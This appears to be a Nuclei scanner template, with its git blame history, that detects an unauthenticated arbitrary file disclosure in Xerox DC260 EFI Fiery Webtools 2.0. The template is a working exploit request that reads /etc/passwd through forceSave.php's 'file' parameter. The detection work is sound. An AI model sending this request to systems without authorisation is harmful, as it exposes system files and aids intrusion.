nuclei-templates/vulnerabilities/other/xerox-efi-lfi.yaml

id: xerox-efi-lfi

info:
  name: Xerox DC260 EFI Fiery Controller Webtools 2.0 - Arbitrary File Disclosure
  author: gy741
  severity: high
  description: Input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary
    files on the affected system.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php
    - https://packetstormsecurity.com/files/145570
    - https://www.exploit-db.com/exploits/43398/
  tags: iot,xerox,disclosure,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wt3/forceSave.php?file=/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
Create xerox-efi-lfi.yaml Input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-01-09 06:39:39 +00:00			`id: xerox-efi-lfi`

			`info:`
			`name: Xerox DC260 EFI Fiery Controller Webtools 2.0 - Arbitrary File Disclosure`
			`author: gy741`
			`severity: high`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`description: Input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary`
			`files on the affected system.`
Create xerox-efi-lfi.yaml Input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-01-09 06:39:39 +00:00			`reference:`
			`- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php`
Update xerox-efi-lfi.yaml 2022-01-10 06:37:06 +00:00			`- https://packetstormsecurity.com/files/145570`
			`- https://www.exploit-db.com/exploits/43398/`
			`tags: iot,xerox,disclosure,lfi`
Create xerox-efi-lfi.yaml Input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-01-09 06:39:39 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/wt3/forceSave.php?file=/etc/passwd"`

			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`regex:`
			`- "root:.*:0:0:"`

			`- type: status`
			`status:`
			`- 200`